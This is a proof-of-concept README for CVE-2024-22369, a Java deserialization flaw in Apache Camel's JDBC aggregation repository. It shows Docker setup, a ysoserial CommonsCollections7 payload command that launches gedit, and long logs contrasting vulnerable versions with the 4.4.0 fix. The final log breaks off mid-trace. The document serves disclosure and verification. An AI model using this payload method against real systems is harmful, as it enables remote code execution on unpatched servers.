## https://sploitus.com/exploit?id=E7884E75-09E8-5756-8AA9-A87ED52B9C76
# CVE-2024-22369
### Credits
This POC is based on the reproducer built by Ziyang Chen of HuaWei Open Source Management Center
The reproducer has been used to create this PoC, with some adjustments and clean up, and also enriched with some more automation.
### Prepare the enviroment
We'll need a Mysql instance
`docker run --name some-mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=my-secret-pw -e MYSQL_DATABASE=db -d mysql`
Now we'll need to create the required tables:
You have two files: employee.sql and employee_completed.sql
Run the following command:
`docker run -it --rm mysql mysql -h 172.17.0.2 -uroot -p`
Insert your password, execute `USE db` and run the two SQL files.
At this stage you already have the required bits to reproduce the deserialization.
Run the following command
`docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' some-mysql`
and take note of the address.
Now edit the src/main/resources/application.properties according to what your enviroment status is.
### Payload
The payload we are using is based on commons-collections 3.2.1.
You'll need to use:
[https://github.com/frohoff/ysoserial](https://github.com/frohoff/ysoserial)
From the command line you can recreate the payload this way:
`java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections7 gedit | xxd -p`
This will return the Hex version of the payload. The idea is to run `gedit` command while deserializing.
You can play with possible payloads and change the SQL scripts by changing the INSERT statement and add the new
generated payloads.
### Run
To reproduce the behavior. First of all select a JDK 17 (locally or through SDKMan).
The run the following command:
`mvn clean install -Dcamel.version=4.3.0 -Dspring-boot.version=3.2.0 -Djava.version=17 spring-boot:run`
This will give the following output:
[INFO] --- spring-boot:3.2.0:run (default-cli) @ camelsql ---
[INFO] Attaching agents: []
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v3.2.0)
2024-01-10T11:50:05.523+01:00 INFO 28404 --- [ main] c.example.camelsql.CamelsqlApplication : Starting CamelsqlApplication using Java 17.0.8 with PID 28404 (/home/oscerd/workspace/apache-camel/security/camelsql/target/classes started by oscerd in /home/oscerd/workspace/apache-camel/security/camelsql)
2024-01-10T11:50:05.526+01:00 INFO 28404 --- [ main] c.example.camelsql.CamelsqlApplication : No active profile set, falling back to 1 default profile: "default"
2024-01-10T11:50:06.897+01:00 INFO 28404 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Apache Camel 4.3.0 (camel-1) is starting
2024-01-10T11:50:06.903+01:00 INFO 28404 --- [ main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Starting...
2024-01-10T11:50:07.062+01:00 INFO 28404 --- [ main] com.zaxxer.hikari.pool.HikariPool : HikariPool-1 - Added connection com.mysql.cj.jdbc.ConnectionImpl@418f890f
2024-01-10T11:50:07.064+01:00 INFO 28404 --- [ main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Start completed.
2024-01-10T11:50:07.093+01:00 INFO 28404 --- [ main] o.a.c.p.a.j.JdbcAggregationRepository : On startup there are 1 aggregate exchanges (not completed) in repository: employee
2024-01-10T11:50:07.094+01:00 WARN 28404 --- [ main] o.a.c.p.a.j.JdbcAggregationRepository : On startup there are 1 completed exchanges to be recovered in repository: employee_completed
2024-01-10T11:50:07.096+01:00 INFO 28404 --- [ main] o.a.c.p.aggregate.AggregateProcessor : Using RecoverableAggregationRepository by scheduling recover checker to run every 5000 millis.
2024-01-10T11:50:07.098+01:00 INFO 28404 --- [ main] c.s.b.CamelSpringBootApplicationListener : Starting CamelMainRunController to ensure the main thread keeps running
2024-01-10T11:50:07.099+01:00 INFO 28404 --- [inRunController] org.apache.camel.main.MainSupport : Apache Camel (Main) 4.3.0 is starting
2024-01-10T11:50:07.106+01:00 INFO 28404 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Routes startup (started:1)
2024-01-10T11:50:07.107+01:00 INFO 28404 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Started route1 (timer://select)
2024-01-10T11:50:07.107+01:00 INFO 28404 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Apache Camel 4.3.0 (camel-1) started in 209ms (build:0ms init:0ms start:209ms)
2024-01-10T11:50:07.115+01:00 INFO 28404 --- [ main] c.example.camelsql.CamelsqlApplication : Started CamelsqlApplication in 1.839 seconds (process running for 2.453)
2024-01-10T11:50:08.176+01:00 ERROR 28404 --- [ timer://select] o.a.c.p.e.DefaultErrorHandler : Failed delivery for (MessageId: 41CB7CFEF0673B6-0000000000000000 on ExchangeId: 41CB7CFEF0673B6-0000000000000000). Exhausted after delivery attempt: 1 caught: java.lang.RuntimeException: Error getting key == 0 from repository employee
Message History (source location and message history is disabled)
---------------------------------------------------------------------------------------------------------------------------------------
Source ID Processor Elapsed (ms)
route1/route1 from[timer://select?repeatCount=1] 69
...
route1/aggregate1 aggregate[${header.aaa} == 0] 0
Stacktrace
---------------------------------------------------------------------------------------------------------------------------------------
java.lang.RuntimeException: Error getting key == 0 from repository employee
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:366) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:341) ~[camel-sql-4.3.0.jar:4.3.0]
at org.springframework.transaction.support.TransactionTemplate.execute(TransactionTemplate.java:140) ~[spring-tx-6.1.1.jar:6.1.1]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:341) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:335) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.doAggregation(AggregateProcessor.java:483) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:406) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:360) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.process(AggregateProcessor.java:316) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.handleFirst(RedeliveryErrorHandler.java:462) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.run(RedeliveryErrorHandler.java:438) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.doRun(DefaultReactiveExecutor.java:199) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.executeReactiveWork(DefaultReactiveExecutor.java:189) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.tryExecuteReactiveWork(DefaultReactiveExecutor.java:166) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.schedule(DefaultReactiveExecutor.java:148) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor.scheduleMain(DefaultReactiveExecutor.java:59) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.processor.Pipeline.process(Pipeline.java:163) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.CamelInternalProcessor.processNonTransacted(CamelInternalProcessor.java:354) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.CamelInternalProcessor.process(CamelInternalProcessor.java:330) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.component.timer.TimerConsumer.sendTimerExchange(TimerConsumer.java:293) ~[camel-timer-4.3.0.jar:4.3.0]
at org.apache.camel.component.timer.TimerConsumer$1.doRun(TimerConsumer.java:164) ~[camel-timer-4.3.0.jar:4.3.0]
at org.apache.camel.component.timer.TimerConsumer$1.run(TimerConsumer.java:136) ~[camel-timer-4.3.0.jar:4.3.0]
at java.base/java.util.TimerThread.mainLoop(Timer.java:566) ~[na:na]
at java.base/java.util.TimerThread.run(Timer.java:516) ~[na:na]
Caused by: java.io.StreamCorruptedException: null
at java.base/java.util.Hashtable.reconstitutionPut(Hashtable.java:1356) ~[na:na]
at java.base/java.util.Hashtable.readHashtable(Hashtable.java:1317) ~[na:na]
at java.base/java.util.Hashtable.readObject(Hashtable.java:1259) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[na:na]
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:na]
at java.base/java.lang.reflect.Method.invoke(Method.java:568) ~[na:na]
at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) ~[na:na]
at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) ~[na:na]
at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) ~[na:na]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.decode(JdbcCamelCodec.java:108) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:82) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:77) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:358) ~[camel-sql-4.3.0.jar:4.3.0]
... 23 common frames omitted
2024-01-10T11:50:08.182+01:00 WARN 28404 --- [ timer://select] o.a.camel.component.timer.TimerConsumer : Error processing exchange. Exchange[41CB7CFEF0673B6-0000000000000000]. Caused by: [java.lang.RuntimeException - Error getting key == 0 from repository employee]
java.lang.RuntimeException: Error getting key == 0 from repository employee
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:366) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:341) ~[camel-sql-4.3.0.jar:4.3.0]
at org.springframework.transaction.support.TransactionTemplate.execute(TransactionTemplate.java:140) ~[spring-tx-6.1.1.jar:6.1.1]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:341) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:335) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.doAggregation(AggregateProcessor.java:483) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:406) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:360) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.AggregateProcessor.process(AggregateProcessor.java:316) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.handleFirst(RedeliveryErrorHandler.java:462) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.run(RedeliveryErrorHandler.java:438) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.doRun(DefaultReactiveExecutor.java:199) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.executeReactiveWork(DefaultReactiveExecutor.java:189) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.tryExecuteReactiveWork(DefaultReactiveExecutor.java:166) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.schedule(DefaultReactiveExecutor.java:148) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.DefaultReactiveExecutor.scheduleMain(DefaultReactiveExecutor.java:59) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.processor.Pipeline.process(Pipeline.java:163) ~[camel-core-processor-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.CamelInternalProcessor.processNonTransacted(CamelInternalProcessor.java:354) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.impl.engine.CamelInternalProcessor.process(CamelInternalProcessor.java:330) ~[camel-base-engine-4.3.0.jar:4.3.0]
at org.apache.camel.component.timer.TimerConsumer.sendTimerExchange(TimerConsumer.java:293) ~[camel-timer-4.3.0.jar:4.3.0]
at org.apache.camel.component.timer.TimerConsumer$1.doRun(TimerConsumer.java:164) ~[camel-timer-4.3.0.jar:4.3.0]
at org.apache.camel.component.timer.TimerConsumer$1.run(TimerConsumer.java:136) ~[camel-timer-4.3.0.jar:4.3.0]
at java.base/java.util.TimerThread.mainLoop(Timer.java:566) ~[na:na]
at java.base/java.util.TimerThread.run(Timer.java:516) ~[na:na]
Caused by: java.io.StreamCorruptedException: null
at java.base/java.util.Hashtable.reconstitutionPut(Hashtable.java:1356) ~[na:na]
at java.base/java.util.Hashtable.readHashtable(Hashtable.java:1317) ~[na:na]
at java.base/java.util.Hashtable.readObject(Hashtable.java:1259) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[na:na]
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:na]
at java.base/java.lang.reflect.Method.invoke(Method.java:568) ~[na:na]
at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) ~[na:na]
at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) ~[na:na]
at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) ~[na:na]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.decode(JdbcCamelCodec.java:108) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:82) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:77) ~[camel-sql-4.3.0.jar:4.3.0]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:358) ~[camel-sql-4.3.0.jar:4.3.0]
... 23 common frames omitted
While the code will fail, at the same time you'll see gedit opening a window.
You can reproduce the same behavior with camel 3.21.3 for example. You'll need to set a JDK 11 (locally or through SDKMan)
You'll need to run:
`mvn clean install -Dcamel.version=3.21.3 -Dspring-boot.version=2.7.18 -Djava.version=11 spring-boot:run`
The behavior will be the same.
### Fix in 4.4.0
To show the fix you'll need to run
`mvn clean install -Dcamel.version=4.4.0 -Dspring-boot.version=3.2.2 -Djava.version=17 spring-boot:run`
This will give the following output:
[INFO] --- spring-boot:3.2.1:run (default-cli) @ camelsql ---
[INFO] Attaching agents: []
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v3.2.1)
2024-01-10T11:55:28.735+01:00 INFO 29206 --- [ main] c.example.camelsql.CamelsqlApplication : Starting CamelsqlApplication using Java 17.0.8 with PID 29206 (/home/oscerd/workspace/apache-camel/security/camelsql/target/classes started by oscerd in /home/oscerd/workspace/apache-camel/security/camelsql)
2024-01-10T11:55:28.741+01:00 INFO 29206 --- [ main] c.example.camelsql.CamelsqlApplication : No active profile set, falling back to 1 default profile: "default"
2024-01-10T11:55:30.122+01:00 INFO 29206 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Apache Camel 4.4.0-SNAPSHOT (camel-1) is starting
2024-01-10T11:55:30.131+01:00 INFO 29206 --- [ main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Starting...
2024-01-10T11:55:30.285+01:00 INFO 29206 --- [ main] com.zaxxer.hikari.pool.HikariPool : HikariPool-1 - Added connection com.mysql.cj.jdbc.ConnectionImpl@261f359f
2024-01-10T11:55:30.286+01:00 INFO 29206 --- [ main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Start completed.
2024-01-10T11:55:30.306+01:00 INFO 29206 --- [ main] o.a.c.p.a.j.JdbcAggregationRepository : On startup there are 1 aggregate exchanges (not completed) in repository: employee
2024-01-10T11:55:30.307+01:00 WARN 29206 --- [ main] o.a.c.p.a.j.JdbcAggregationRepository : On startup there are 1 completed exchanges to be recovered in repository: employee_completed
2024-01-10T11:55:30.308+01:00 INFO 29206 --- [ main] o.a.c.p.aggregate.AggregateProcessor : Using RecoverableAggregationRepository by scheduling recover checker to run every 5000 millis.
2024-01-10T11:55:30.310+01:00 INFO 29206 --- [ main] c.s.b.CamelSpringBootApplicationListener : Starting CamelMainRunController to ensure the main thread keeps running
2024-01-10T11:55:30.312+01:00 INFO 29206 --- [inRunController] org.apache.camel.main.MainSupport : Apache Camel (Main) 4.4.0-SNAPSHOT is starting
2024-01-10T11:55:30.322+01:00 INFO 29206 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Routes startup (started:1)
2024-01-10T11:55:30.322+01:00 INFO 29206 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Started route1 (timer://select)
2024-01-10T11:55:30.322+01:00 INFO 29206 --- [ main] o.a.c.impl.engine.AbstractCamelContext : Apache Camel 4.4.0-SNAPSHOT (camel-1) started in 198ms (build:0ms init:0ms start:198ms)
2024-01-10T11:55:30.328+01:00 INFO 29206 --- [ main] c.example.camelsql.CamelsqlApplication : Started CamelsqlApplication in 1.844 seconds (process running for 2.102)
2024-01-10T11:55:31.352+01:00 ERROR 29206 --- [ timer://select] o.a.c.p.e.DefaultErrorHandler : Failed delivery for (MessageId: 5F06C78575E3CDB-0000000000000000 on ExchangeId: 5F06C78575E3CDB-0000000000000000). Exhausted after delivery attempt: 1 caught: java.lang.RuntimeException: Error getting key == 0 from repository employee
Message History (source location and message history is disabled)
---------------------------------------------------------------------------------------------------------------------------------------
Source ID Processor Elapsed (ms)
route1/route1 from[timer://select?repeatCount=1] 30
...
route1/aggregate1 aggregate[${header.aaa} == 0] 0
Stacktrace
---------------------------------------------------------------------------------------------------------------------------------------
java.lang.RuntimeException: Error getting key == 0 from repository employee
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:367) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:342) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.springframework.transaction.support.TransactionTemplate.execute(TransactionTemplate.java:140) ~[spring-tx-6.1.2.jar:6.1.2]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:342) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:336) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.doAggregation(AggregateProcessor.java:483) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:406) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:360) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.process(AggregateProcessor.java:316) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.handleFirst(RedeliveryErrorHandler.java:462) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.run(RedeliveryErrorHandler.java:438) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.doRun(DefaultReactiveExecutor.java:199) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.executeReactiveWork(DefaultReactiveExecutor.java:189) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.tryExecuteReactiveWork(DefaultReactiveExecutor.java:166) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.schedule(DefaultReactiveExecutor.java:148) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor.scheduleMain(DefaultReactiveExecutor.java:59) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.Pipeline.process(Pipeline.java:163) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.CamelInternalProcessor.processNonTransacted(CamelInternalProcessor.java:354) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.CamelInternalProcessor.process(CamelInternalProcessor.java:330) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.component.timer.TimerConsumer.sendTimerExchange(TimerConsumer.java:293) ~[camel-timer-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.component.timer.TimerConsumer$1.doRun(TimerConsumer.java:164) ~[camel-timer-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.component.timer.TimerConsumer$1.run(TimerConsumer.java:136) ~[camel-timer-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at java.base/java.util.TimerThread.mainLoop(Timer.java:566) ~[na:na]
at java.base/java.util.TimerThread.run(Timer.java:516) ~[na:na]
Caused by: java.io.InvalidClassException: filter status: REJECTED
at java.base/java.io.ObjectInputStream.filterCheck(ObjectInputStream.java:1409) ~[na:na]
at java.base/java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:2044) ~[na:na]
at java.base/java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1898) ~[na:na]
at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2224) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) ~[na:na]
at java.base/java.util.Hashtable.readHashtable(Hashtable.java:1313) ~[na:na]
at java.base/java.util.Hashtable.readObject(Hashtable.java:1259) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[na:na]
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:na]
at java.base/java.lang.reflect.Method.invoke(Method.java:568) ~[na:na]
at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) ~[na:na]
at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) ~[na:na]
at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) ~[na:na]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.decode(JdbcCamelCodec.java:104) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:77) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:72) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:359) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
... 23 common frames omitted
2024-01-10T11:55:31.355+01:00 WARN 29206 --- [ timer://select] o.a.camel.component.timer.TimerConsumer : Error processing exchange. Exchange[5F06C78575E3CDB-0000000000000000]. Caused by: [java.lang.RuntimeException - Error getting key == 0 from repository employee]
java.lang.RuntimeException: Error getting key == 0 from repository employee
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:367) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:342) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.springframework.transaction.support.TransactionTemplate.execute(TransactionTemplate.java:140) ~[spring-tx-6.1.2.jar:6.1.2]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:342) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository.get(JdbcAggregationRepository.java:336) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.doAggregation(AggregateProcessor.java:483) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:406) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.doProcess(AggregateProcessor.java:360) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.AggregateProcessor.process(AggregateProcessor.java:316) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.handleFirst(RedeliveryErrorHandler.java:462) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.errorhandler.RedeliveryErrorHandler$SimpleTask.run(RedeliveryErrorHandler.java:438) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.doRun(DefaultReactiveExecutor.java:199) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
